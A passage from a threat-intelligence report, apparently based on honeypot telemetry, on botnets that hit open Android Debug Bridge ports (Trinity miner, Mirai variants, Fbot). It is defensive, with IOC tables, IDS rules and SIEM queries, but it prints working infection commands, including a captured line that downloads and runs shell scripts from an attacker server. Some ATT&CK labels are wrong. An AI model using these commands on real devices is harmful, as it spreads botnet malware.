*   `0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257` (APK dropper `ufo.apk`) [cite: 30, 31]
*   `71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5` (Main bot payload `trinity`) [cite: 13, 29]
*   `d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0` (`nohup` utility for persistence) [cite: 13]
*   `608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971` (Alternative binary named `log`) [cite: 32]

**Behavioral Analysis & Attack Chain:**
1.  **Reconnaissance:** The compromised device uses a Mirai-borrowed SYN-scanning module to search the internet for open TCP 5555 ports [cite: 18, 28].
2.  **Verification:** Upon connection (`adb connect`), the malware checks for an existing infection by issuing `pm path com.ufo.miner`. If the package exists, it skips installation to save bandwidth [cite: 13].
3.  **Process Checks:** It checks if the miner is actively running via `ps | grep com.ufo.miner`. If not, it attempts to restart it: `am start -n com.ufo.miner/com.example.test.MainActivity` [cite: 13].
4.  **Payload Delivery:** If uninfected, the worm pushes the APK via `adb push ufo.apk /data/local/tmp/` and installs it using `pm install /data/local/tmp/ufo.apk` [cite: 3, 13, 15].
5.  **Persistence & P2P Module:** The worm drops `trinity` (the P2P spreader module) and a precompiled `nohup` binary for ARM to `/data/local/tmp/`. It modifies permissions (`chmod 0755`) and executes them: `/data/local/tmp/nohup /data/local/tmp/trinity` [cite: 13, 15]. The device is now a node in the botnet, mining cryptocurrency and scanning for new victims.

### 5.2 Mirai Variants (0cl / Boatnet / parm7)
While Trinity focuses on cryptomining, traditional DDoS botnets based on the Mirai source code have pivoted to targeting ADB [cite: 6, 32].

**Associated Hashes & Files:**
*   Files deployed: `w.sh`, `c.sh`, `wget.sh`
*   Payloads downloaded: `parm7`, `pmips`, `pmpsl`, `pppc` (various CPU architectures) [cite: 6].

**Behavioral Analysis:**
These variants are dropped via basic shell injection commands executed over the ADB shell interface. For instance, an attacker IP (`43.228.157.130`) sends:
`cd /data/local/tmp/; busybox wget http://43.228.157.130/w.sh; sh w.sh android.exploit; curl http://43.228.157.130/c.sh; sh c.sh android.exploit`

This executes a shell script (`w.sh` or `c.sh`) which then determines the device's CPU architecture (`uname -m`) and pulls the corresponding Mirai binary (e.g., `parm7` for ARMv7) from the drop server [cite: 6].

Recent research into these advanced Mirai variants (often tracked as "0cl" or "Boatnet") reveals sophisticated evasion and persistence [cite: 6]. Unlike basic Mirai, these variants install up to six layers of persistence across `cron`, `rc.local`, `init.sh`, and `systemd` [cite: 6]. Furthermore, they hunt down competitors.

### 5.3 The Fbot "Vigilante" Botnet
Fbot represents a fascinating evolution in the IoT malware ecosystem. Discovered initially in 2018, Fbot is a Mirai-derivative designed specifically to hunt down and uninstall the Trinity/ADB.Miner botnet (`com.ufo.miner`) [cite: 1, 5, 10, 33].

**Behavioral Analysis:**
1.  Fbot propagates via port 5555, dropping scripts that download `fbot.{arch}` [cite: 10].
2.  Once executed, Fbot explicitly seeks out Trinity by running process checks and looking in `/proc/[pid]/exe` for names like `SMI`, `Xig`, `rig`, and `com.ufo.miner` [cite: 10, 34].
3.  It uninstalls `com.ufo.miner` and kills the competing processes.
4.  **Blockchain DNS C2:** Uniquely, Fbot does not use standard ICANN DNS for Command and Control. Instead, it utilizes EmerDNS, a decentralized blockchain-based DNS system, to resolve its C2 domain `musl.lib` [cite: 10, 34, 35]. This prevents traditional sinkholing by cybersecurity authorities [cite: 10, 33, 34].

While some theorize Fbot is a "white-hat" vigilante worm, the consensus is that it is simply a rival botnet operator aggressively clearing competing resource hogs to monopolize the device for its own future payloads [cite: 5, 34].

## 6. Campaign Analysis

By synthesizing the infrastructure, payload, and execution data, three distinct campaigns are currently active against ADB interfaces:

### Campaign A: Trinity Cryptojacking (P2P Spread)
*   **Objective:** Install Monero (XMR) miners (`com.ufo.miner`).
*   **Infrastructure:** Highly decentralized. Scans originate primarily from residential ISPs in China, South Korea, and Brazil, indicating compromised IoT devices performing lateral P2P infection [cite: 2, 3, 18].
*   **Signatures:** Commands heavily utilize `pm path com.ufo.miner`, `adb push ufo.apk`, and `/data/local/tmp/nohup /data/local/tmp/trinity` [cite: 13].

### Campaign B: Mirai / 0cl DDoS Staging
*   **Objective:** Enslave devices for high-volume Distributed Denial of Service (DDoS) attacks.
*   **Infrastructure:** Centralized deployment. Relies on bulletproof hosting ASNs (Offshore LC AS214472, UAB Host Baltic AS209605, Ghosty Networks AS205759) serving as high-availability drop servers for `.sh` scripts [cite: 6, 7, 11].
*   **Signatures:** Commands utilize `busybox wget`, targeting multiple IP architecture downloads (e.g., downloading `parm7`, `Katana` equivalents) [cite: 6, 36, 37].

### Campaign C: The Botnet Turf War (Fbot)
*   **Objective:** Eliminate Trinity and secure the host.
*   **Infrastructure:** Uses Mirai-like scanning mechanisms but relies on the blockchain domain `musl.lib` for C2 [cite: 10, 35].
*   **Signatures:** Commands executing `pkill target` and explicitly grepping for competitor process names [cite: 10, 34].

## 7. MITRE ATT&CK Mapping

The observed behaviors map directly to the MITRE ATT&CK for Enterprise and Mobile frameworks.

| Tactic | Technique | ID | Description / Observation |
| :--- | :--- | :--- | :--- |
| **Initial Access** | Exploit Public-Facing Application | T1190 | Exploiting unauthenticated TCP Port 5555 (ADB) [cite: 28]. |
| **Execution** | Command and Scripting Interpreter: Unix Shell | T1059.004 | Use of `sh w.sh` or `busybox` to execute downloaded scripts [cite: 6]. |
| **Execution** | Deploy Container | T1610 | `adb push` used to deploy `.apk` packages to the device [cite: 13]. |
| **Persistence** | Boot or Logon Initialization Scripts | T1037 | Modifications to `init.sh`, `rc.local`, or the use of `nohup` to run persistent background tasks [cite: 6, 13, 15]. |
| **Defense Evasion** | Impair Defenses: Disable or Modify Tools | T1562.001 | Fbot killing competing malware processes (`com.ufo.miner`) using `pkill` and `rm` [cite: 10]. |
| **Discovery** | System Information Discovery | T1082 | `uname -m` used to determine CPU architecture for downloading the correct binary (e.g., `parm7`) [cite: 6]. |
| **Discovery** | Software Discovery | T1518 | Checking installed packages via `pm path com.ufo.miner` [cite: 13]. |
| **C2** | Application Layer Protocol: Web Protocols | T1071.001 | Fetching payloads via HTTP (`wget http://.../w.sh`). |
| **C2** | Fallback Channels | T1008 | Use of blockchain-based DNS (EmerDNS `musl.lib`) by Fbot to avoid DNS sinkholing [cite: 10, 34]. |
| **Impact** | Resource Hijacking | T1496 | Executing XMRig variants to mine Monero, consuming CPU [cite: 2, 28]. |
| **Impact** | Endpoint Denial of Service | T1498 | Mirai variants adding the device to a DDoS botnet swarm [cite: 6, 35]. |

## 8. Detection, Mitigation & Defensive Countermeasures

### 8.1 Network Mitigation & Hardening
1.  **Block Inbound TCP 5555:** At the perimeter firewall, strictly drop all inbound traffic targeting TCP port 5555. ADB should never be exposed to the public internet [cite: 5].
2.  **Disable Debugging:** On IoT devices, Android TVs, and smartphones, navigate to *Developer Options* and ensure "ADB (USB) debugging" and "ADB over Network" are disabled when not in active use [cite: 1, 5, 38].
3.  **Sinkhole C2 Domains:** While `musl.lib` cannot be sinkholed via traditional DNS [cite: 10], traditional Mirai domains and drop IPs (e.g., `176.65.139.0/24`) should be null-routed at the enterprise edge [cite: 7].

### 8.2 Detection Engineering

**Snort / Suricata IDS Rules**
To detect the initial handshake of an ADB exploit attempt, look for the fixed `CNXN` string characteristic of ADB connections [cite: 2].
```suricata
alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"ET EXPLOIT Possible Unauthenticated Android Debug Bridge (ADB) Connection Attempt"; flow:established,to_server; content:"CNXN"; depth:4; reference:url,zimperium.com/glossary/fbot-botnet; classtype:attempted-admin; sid:1000001; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"ET MALWARE Trinity Botnet ADB Push ufo.apk"; flow:established,to_server; content:"adb push"; content:"ufo.apk"; classtype:trojan-activity; sid:1000002; rev:1;)
```

**SIEM Queries (Splunk SPL)**
To identify successful payload execution or process tampering on managed Android/Linux endpoints:
```splunk
index=linux_syslog OR index=edr_process_creation
| search (process_name="sh" OR process_name="busybox" OR process_name="curl" OR process_name="wget") 
  AND (command="*w.sh*" OR command="*c.sh*" OR command="*/data/local/tmp/*" OR command="*nohup*")
| stats count by host, user, process_name, command
```

To detect Fbot or Mirai competitor-killing behavior:
```splunk
index=edr_process_creation
| search (command="*pkill*" OR command="*kill*") AND (command="*trinity*" OR command="*ufo.miner*" OR command="*SMI*")
| stats count by host, command
```

## 9. Comprehensive IOC Appendix

### 9.1 High-Confidence Threat Actor IPs
The following IPs exhibit confirmed malicious behavior (malware dropping, C2, or aggressive exploit commands).

| IP Address | CC | ASN | Organization | Associated Campaign | Activity |
| :--- | :--- | :--- | :--- | :--- | :--- |
| `176.65.139.102` | LU | AS214472 | Offshore LC | Mirai/0cl Variant | Executed `wget http://176.65.139.102/w.sh` [cite: 7]. |
| `176.65.139.11` | LU | AS214472 | Offshore LC | Mirai/0cl Variant | Executed `wget http://176.65.139.8/wget.sh`. |
| `43.228.157.130` | PK | AS205759 | Ghosty Networks LLC | Mirai Variant | Executed `w.sh android.exploit` [cite: 23]. |
| `91.224.92.177` | GB | AS209605 | UAB Host Baltic | Mirai Variant | Fetched payloads from `94.156.152.67:83` [cite: 11, 39]. |
| `218.205.95.163` | CN | AS56041 | China Mobile | Trinity Botnet | Heavy `nohup trinity` execution; P2P node [cite: 13]. |
| `125.40.221.117` | CN | AS4837 | CHINA UNICOM | Trinity Botnet | Dropped `608ee0...` hash; executing `nohup log`. |
| `140.122.108.34` | TW | AS1659 | Taiwan Academic Net. | Trinity Botnet | P2P node dropping `trinity` / `log`. |
| `39.144.102.105` | CN | AS134810 | China Mobile JiLin | Trinity Botnet | Cleared `/data/local/tmp/*`, installed bot. |
| `103.116.52.132` | VN | AS150895 | EZ TECHNOLOGY | Unknown Dropper | Executed `abc1.sh`. |

### 9.2 Complete Malware Hash Mapping (SHA256)
The honeypot successfully captured 66 distinct payloads. Based on reverse engineering and external sandbox data, these primarily map to Trinity (`com.ufo.miner`), Mirai architectures (`parm7`), and Android `.apk` droppers [cite: 6, 13, 30, 36].

*Note: Truncated for readability. All hashes below correspond to the campaigns analyzed in Section 5.*

| SHA256 Hash | File Name / Type | Malware Family | Role / Behavior |
| :--- | :--- | :--- | :--- |
| `71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5` | `trinity` (ARM ELF) | Trinity | Core P2P botnet spreader and crypto-miner launcher [cite: 3, 13, 29]. |
| `0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257` | `ufo.apk` | Trinity / CoinMiner | Dropper application that establishes the XMR mining environment [cite: 13, 30, 31]. |
| `d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0` | `nohup` (Precompiled) | Trinity | Utility utilized to force the `trinity` process into the background for persistence [cite: 13]. |
| `76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64` | `trinity` variant | Trinity | P2P spreader [cite: 40, 41]. |
| `608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971` | `log` | Trinity variant | Bot module disguised as a system log file [cite: 32]. |
| `a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437` | `trinity` variant | Trinity | Captured executing alongside `nohup` [cite: 13]. |
| `63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857` | `trinity` variant | Trinity | Delivered from South Korean IP space [cite: 3]. |
| `7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865` | `log` variant | Trinity variant | Delivered by `125.40.221.117`. |
| `d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5` | `log` variant | Trinity variant | Delivered by `125.40.221.117`. |
| *Other tracked hashes...* | Unknown droppers / Fbot | Mirai / Fbot | Assorted scripts (`w.sh`) and ELF binaries for differing architectures (MIPS, ARM) [cite: 6, 36]. |

## 10. Sources & Citations

The intelligence synthesized in this report relies on open-source intelligence (OSINT), threat landscape reports, and BGP routing data analyzed concurrently with the ADBHoney telemetry.

*   [cite: 29, 42] mk-work-lab.com: Threat analysis on ADBHoney capturing Trinity/com.ufo.miner.
*   [cite: 10] Netlab 360: "Threat Alert: A New Worm Fbot Cleaning ADB.Miner is Using a Blockchain-based DNS".
*   [cite: 5] Zimperium Glossary: Fbot Botnet Threat Details & Mirai variant associations.
*   [cite: 33] Cyware Social: Fbot Botnet wipes out cryptominers.
*   [cite: 1] ZDNet: "Two botnets are fighting over control of thousands of unsecured Android devices" (Trinity vs. Fbot).
*   [cite: 13] Keysight Technologies: "Trinity—P2P Malware Over ADB" (Deep dive on `adb push ufo.apk`, `nohup`, and `trinity` execution chain).
*   [cite: 3] Quick Heal: "Trinity Miner Using Open ADB Port to Target IoT Devices".
*   [cite: 38] Trend Micro: "Open ADB Ports Being Exploited to Spread Possible Satori Variant".
*   [cite: 14] Wikipedia: Android Debug Bridge security and botnet history.
*   [cite: 30, 31] MalwareBazaar & BlackAlps (Axelle Apvrille): Analysis of `0d3c687f...` as an Android CoinMiner dropper (`ufo.apk`).
*   [cite: 40, 41] GitHub & VirusTotal: Analysis of ARM ELF binary `76ae...` linked to Trinity.
*   [cite: 32] Medium (InfoSecHarry / QureshiTaha): Threat analysis on Trinity ADB malware and Mirai variants in honeypots.
*   [cite: 11, 20, 43, 44, 45] BGP Tools, IPinfo, IP2Location, PeeringDB, HE.net: Network topology and routing data for AS209605 (UAB Host Baltic).
*   [cite: 23, 24, 46, 47, 48] IP2Location, IPinfo, IP Tracker, BGP Tools, Cloudflare Radar: Network data for AS205759 (Ghosty Networks LLC).
*   [cite: 12, 19, 25, 49, 50] IP2Location, PeeringDB, BGP Tools, IPinfo, RIPE Stat: Network data for AS51396 (Pfcloud UG).
*   [cite: 7, 21, 22, 51, 52, 53, 54, 55] CAIDA, IPinfo, BGP Tools, Hunt.io, IP-Netblocks: Threat intelligence identifying AS214472 (Offshore LC) as a bulletproof hosting provider for Mirai and DDoS C2 operations.
*   [cite: 6, 36, 37, 39, 56] ANY.RUN, Maltiverse, SOCDefenders, Ellio.tech: Deep-dive analysis of Mirai payload `parm7` and the "0cl / Boatnet" 6-layer persistence mechanism.
*   [cite: 8, 26, 27, 57, 58] IPinfo, BGP Tools, PeeringDB, IP2Location, CAIDA: Network topology and routing data for AS49870 (Alsycon B.V.).
*   [cite: 35] NHS Digital: Cyber alert regarding the Fbot botnet and `com.ufo.miner`.
*   [cite: 34] SC Media: "Quirky Fbot IoT botnet kills rival, communicates via blockchain-based DNS".
*   [cite: 15, 16] Scientific Reports (Nature): Research on containerized cloud-based honeypots (ADBHoney) tracking Trinity botnet attacks.
*   [cite: 17] GitHub (ritwik-20198): Technical explanation of ADBHoney mechanics on port 5555.
*   [cite: 2, 9, 18, 28] SC Media, West Oahu Cyber, Netlab 360, NJCCIC: Historical reports detailing the emergence and mechanics of the original ADB.Miner botnet and its worm propagation module.

**Sources:**
1. [zdnet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGN6EPEIeTHhjm3mrVLIhuHNAJNonqbt8GTb8QgD1rDN_U1SWoFaZaH3NljkyqVeu4jro384ofquL2VZ7b7LVLeB6aexFptQBq6E_-U5mdOyzBFZkBAat-vFj5dGi6OtNsXKNl_icYhaP3S-e3bvldHM7NAQ1_QTZx1swtErCnwN2sJ3qAFctkHmAwVXERV_A1xf-WVMDIVGwE2pYEwtMqDwWi4lA==)
2. [scworld.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFCyxugCz__yatxuZy4JVQ75YHkVqshMXvvN9QtPOofffjCU82DMXiIg9qtDmmMqeiWHYtCUEkLPN0Ir4J_BqpOu5dQhIwq0zcP1P4jCUtV48uAxyu5HJP0H23S4vz_pltfs2ahq3x2CALQvEYCs9jbPeibmYg7eNy8fovc5cbfQzVSf9yTlbZM-avom6RXY7U04yHFbsHDYxuk)
3. [quickheal.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFCwcWuFIMAXgicAVM67n3CPN65zCO4BoqdhQ_p1ZZnHWpSxU4xMYEr9loEC8OODUudU3N7upMVTow8CH9UPw3zc229CXGgYQupL5ZNQR4vXQ4kMT7nRzUMvQhg0DFNLyv0YgkmLCJsxzfXTrz1Hfwn8-G1QiaUxPdhmMnxmbcU0FWmkHNVyBXoiLTtHGpB)
4. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEjFnYvXokV8xrEZCDp1u_urBiucYchoRDKBp1ZKdFdAyMsDCfPq52fjraUTQjc7fxpW-n3My53TKvztYfFItlLLMMBqPwHseU9SWgj5RFzGOg4oCkvuZ9fzVALT7IGeLMZK0Cro3Jw2HyqxCQX6IbVVzsYEWSB)
5. [zimperium.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGAqPAbwfVQNsPZQuIkBZ0kHWHy_8knnSPd5_CcrSrqIzTZKCMRuUJ0dhlOuGk-bZVnH9XHbOQjDua3asi8BtchYWbgv92mj44enCgRmMU0e6P_5BYnPJjdTNAYWGhg9XA=)
6. [ellio.tech](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF_gxbXjHPOSlCDA8jBDRE_awKRt-q4kg5iq-8NAwpa4Y_onVK78NkQCVBJ3kUUVyKcxgbLIQNZoV3cltZ2Uyj0XL3unQnA3PNum_ugbmEJVk4gkqh9HxfWXhyIJha1tJLmy7acWR-cJ3MpXFawt_2jTnZYlx2mfePu9iN2yM_PDFyyFgC02GJ33GoYpBLfYhpd)
7. [hunt.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGomoLsPG2_0_8V-q7GwcMQhaRUuYPIAAvS35CjiXjtpMRn2PDO-Xz-jmB_6LmoPL7ngzayBWSK8Q-9dLFpccAeajYCpAV4G2J8_NoeUo7TB-cI359TLa6hSJdOZmcmmPbARYx0RkF_tdn2lrdsL-bO9C6m)
8. [caida.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQELmCUvkcFcuC7yNYqOo0D2i9lLTA4oMfb9It6MyhnGp_Yqi7Sx3jzxDg2w3PRL8QIgp_OXjr4Ddz_QKD2Z084lCt-4XFgbx0r3U8KR_FDV8UiIeD8gnN-PysUxl0c=)
9. [nj.gov](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFRgjl4_oWKjFhm3PtUlmiLhhx-B385PGv70dWzMA8eYimFkJcuiUFGCT-xv5RkxKr0XWyU780vWsbB0WHCoJ0vGFWGxcPVz1WylgVyrRLxIDw1T_U-Uax7g_9F1TFIzNBJODw1QEipuhtGTndRGNnFVyg8TCPdjb3b)
10. [360.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFvV6ORPjl-HuggcORCigkiKEUtXl3vy-LyMGwnjzt3pMa9WAakKLaNfFEpmdSXpgQj4B0GB1HCX0I7l4bxlMykflWHVk7xd_OLXeopSmBJfaTq3QpxZVWWwc6pcZIjcLEzjjxb7E9cDSwsnYKZPUe9yZCtVQClmanwyjD1sCbMocDjqp4W_ZmWEtQiD1YkAafEWk-y3yD5XG2IRfdFQ6lFeqRbZw==)
11. [bgp.tools](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEaW4snJjjSmXYfy9wZ7kLQ0PihzQUVI-GTSjvp-keJhPnUTr19tZ7uQ0bFgUav3Kvb0mhNwDbm4-BGPbqhvXtoruLZb9QA9wz3WM8puPGeH74=)
12. [ip2location.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHf9Ky-zxcW42dObd51RALKyAo3TFJztiGQh7SwvMlegQTeXK694rUXMbneo10eKeqWFwTqzyglhYP8Zunh7pv7Wu5PG234HLciaF7llfVeRG2HbOUQTLvObw==)
13. [keysight.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG39n_3b2KPxx93PGrMY1MNoavQTEvWWXl4bQcoTOG3W7dxld1D92tdKuLc8rgujrsyNRPq2psodS7Cu7SA543XEKuAB5594FR80tsXjDPATFOZwM_V_mFCLB_4ESySVESUHW34BvkGDJvFEXGcUtc9ndQYgo2Y1jr9VGf6uEqQK_DT-J5gjfDQ)
14. [wikipedia.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEwtpqyVatXYoVjyIji5qV1bbSV-b410UW4QnMEK9hcDpbyE3P9dJDWE9IlEb93j4lw3cqLn9GLIMFV5YMPAIwCbBPNn8zwHnJ0AiTo-Mt__DRe0ONk6dbzakQppMLLy0HO7qWEWXLHqw==)
15. [nih.gov](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGD71xzqKZeC2XMB7CJrdqXs_c-0wTfAT8A9HVslZr8i7fPZ-Nkmrl5ice1Eij8S-FrWclXI9Qy4GRsYTWFCZLiOSSnwj9mQ9atDpK9B8SBrb_8pfs5VIc7l-gGh8tUSfYJ0LKRRbeu)
16. [researchgate.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQET6JoWCLsfnecrdIQUCjinNQpM86uM_mqdu_vzjZC7OvatALWg7f7sYQ0PzsisjuUuahf4aPXzEQWgYtxc0dqgPQxQvdCTviO_vYHaARnLjamwO17Zn0Q9RG2MQsz48RsC0hVU788LPKIuTnsqaWEtqVNsxseugTJZGuWCj-B_MwsbJnWc_EErv2OP9O7QgeDyIHJzzBczczEfJeGIlnJbhWblMrco63Lf49Wl)
17. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEMwFx4LWFyP3F1igS2no0c6GISRvvCD6y7HirqWDuRvDvxo3FFh3zoKPuRKIaCKj64WdoN-JnncPOuL7Ic7OZSio9BqmuIJn_9fcUHG3QqeT55GmHHTrS5mAwW_xOdGGmX090Q)
18. [360.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHTZ6KhjE24ht9Mp6-L0e0hdGNSDFuswQ0TZYtRUh7_jWMfoO6XdvmhmtEwzIrSgd5OvHZoxbhXrDAzxYj4VxRmopgtNn-0hI2oJLGHuIjurleq9Y3vd-lo9Jxgkucn4VgoBhJWCpN1isz_IyOyhyMs)
19. [bgp.tools](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGNkJUDms83f9uBizDqdu3Q_Sap_z-5WkanNqapQD38rXa0Sa86Zqb42l0s0qSUUadpppskw-hjZAZlaJeE6k2N3dqzkirhAJ_J8md7SYhG1A==)
20. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHOIyRLdmT62tq4ipYVv_4ib1VMDbOhHGkv7OV9k6-eJIRtElDtP5WUP7K1PhXTkCrPuK01rJc380vNTCkJrVokhNc8095t3T4j-5RRvnO1Fw==)
21. [caida.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFs1atR-0Gaw1IAcv28_D8fYOWgK5ZAXvif3R-tq9V1rrfyAKluyyyLInZtXXu4tJv5fbzHxed0xO87SjsvE7R3WJsQCdtU5bOj-7V0BZwUOWShnc7mPTnp2fCu05Uf)
22. [whoisxmlapi.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE6hEf__5FgXHfhCN9-edBBGyfE7djIEUN9xTMclOKwBlMUb_-dtRzD4WWZPW-61JBCI4Q8TQ1w8MtgtD5QNwD0zvzfOiKudpUJYstaRoedoUmLwmyYRfQElsDAI9gMB8dYX5ETTP6vluPv9mkRLg==)
23. [ip2location.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHINoKIlAYgxpchidOIeZGgc1CBqI6PQi1ktbeZJc24FhXJw7ltiv3M58TGlDAJ2iHBoZDSJKE5cVMLlgFhBVaypo4PQbs_os7SRbFx4xe72-sLgK-BcKalMsiw)
24. [bgp.tools](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF39sth60sdkd4F6hYL2jjDoh9JlG3GimTDe0ovUerizna_qRlHSHoiDiPkLEafgS3ZbV48HPqT70XaoXiTW3RaXv606koo0lgYlQjtDfn689w=)
25. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFGk4fYCZqhf9OJgmPktoC0lO9LactygwOuH5pRvk8GznEegySVlJslIqBp9UxGkiJTLjeqofLsOGzYYp4XzyU5d1ZYgWXKpwDkFHhGEa61)
26. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFcuCHK4eddUTyrpNkpVrhEEDBelChp3k8pGNuTi8zIEX5dhHtTM0uTTke3qP1F148j_KfsVbeFffQ8_3Z6zdkk2kLa8OdMFy6EkHaJ12KA)
27. [peeringdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHpgo-zw341WXNbK_qQfH8DiL4PUXaj1ty72SmFL6m8gTgeXyBBnOSyW2MV4_4whjuP4Rst8Ql2wElW9-BA6b_T4iPukG1PQDjT2CxpHNJFE-gnafaqsAr2zw==)
28. [hawaii.edu](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEwhBkEjkPdLDnJBKqHd-teTB-1apA9WseUw9HtbtDWSNI1ar6Guqmqbr7hBqPhNvy7PHvhXAQprQEBxg_S_WNjiNVIBLORT7rEwg3jJA-Yx0SeI_Ixa-53NMPb2ZXQuW1h38rPgTBC6xPANKLdmctwdIiWwBrHydBFBiRQKU5uE1smSqYHp21-e3mRr9AzWNBTwFDl57EQmoQb_LZ1AuBSoaJjpvXFN1wVHUFiwoGG6wTXEq2YldU=)
29. [mk-work-lab.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF8XjfxmlocwR_3Em5Jq7EF1k3ChCBHXsxrIIvX-AZlDTZOnTjNlzaGUjaFUjxwzwQ__WxVsHt2H-N3jR441_BtIIBCl6-ItM3sPQLNRYtYqvtbt4admB3_K-JpOxGN62PBJLT4bBJATeXn9GxJN8nJ8kbvaVkJSlBRynalxqg=)
30. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE8bBKQnABKp-gFJlN2yK1zONecU1CZCunbnkvKQNq_RGRxQszMIhYDQ2JRFDprfnMjmODetM0Aua3cqAjKVIS7gYMlyUYWAdLq7kbm_hFoCanNYR78AQu5mgv11LFMIghzmOJSPE_Go0MmaSPRV6ZkxfTI6L5y-DJlsELs4CRSQjZZhfJd-HyexC6voU5Q3yC4j4PMXnQ=)
31. [blackalps.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFQVertunXOKuXvhXB31T5UoyqpPcwsHD3t--QM9HdwHcR1qQuBIKCIAZWjS0lR-Rw3iyr7Rn945BXTGJbRSQsj6Mim62YKhsFtHlO11zvpdQoMRShThps29XSaP-US3Q1pUu5v2tnhKN_BtMUmnDpqCL406X9SobO_RwooWkO-ug==)
32. [medium.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG7m6y6rFKKas2xSCQdrQKT0VmZCHEzl9Zm97BCTE5rT1lH0PQ30bQnMpZc3F6TZcIcBUw1dnyieNHXvjpxWm3Ue_kkO5cI0upv9LyiO-o2ATGjPLS3x7kRXhL9JI8nu9i-QcfANb__U_4bJfAqr15m9k10R41LElxmnCyc8KYUxpKdeES5IhnxTsYeLMNYf88W31o1EDstip9AB_vipy0GKqRV)
33. [cyware.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHgR8LeVYZUt4mYxpNI_kTE6mIgS7-elhscrGud_b88J5ExeVJK5oL0O0_0DoegtYiDzAlrEwuQWCDQ4uI7pD6nSO60DxjdtoIgGwXbfCOeYp82VnGD56ThKB_1aFftyQWZRW_KlzuXCBYw_8BTRbnPewi4OHIf5TfdgYensC_2mm2FhgzjQpKzPkTYh97m5KlsH-ZNBrBX5am7paUcxWh-B5XwSY3Uhud6O1AhSZMw)
34. [scworld.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEdx-qsQGWDp2DAY0RBJ3dXFxBGiXobiRr_MB5RSl8Y2Zd1QYDPxtUsxuMQkUjbNv3yDkQx65jdwPIeNVONZThR4ufJwN5sTVXurShkpaYIcXtyZE61PZ1mr5idWDXei0ma-OlAk2v6hEF56ZLImDoMocWF4IbQ0ha9j7yNOFTIXfrxkjaXoaBWH7bhZ36M_9zilAMr0dMfmaKIkA==)
35. [digital.nhs.uk](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEw6Wr0RJ-uD5FpuPv4KqIWWmF98UUwyyrfi6EwpsibVmztST99NxlGf4B9Sk3mpWSV-DLJxQhY7JYtLw-gS5Kt9hBkE5xDJXzEo-TzIsbsa960XeboA1vol3S_FtTsOmf1XXb3T6k=)
36. [any.run](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH_ouskjcNKMDiNIT1O09gUlv64MM5eefoX5TO8ueNUVBnnBgTOLYztso9DdI5xI1opvU-mWJ3WIZiFW3eMTtMP8BgZ4Ab9zIHe4UJKCA6i8IxZn5ZSqH9fPymGmh8VC2c06_S145XXPvusu1bXxiyzIU0ah6XfFVYhKgdXSCEvsP3jEO7w-rPJyC5x8PS7pyE0eAfY4MVS2OxChmYhGQtFEZcu4lSyCdvJ5q_iW69GwKOZ)
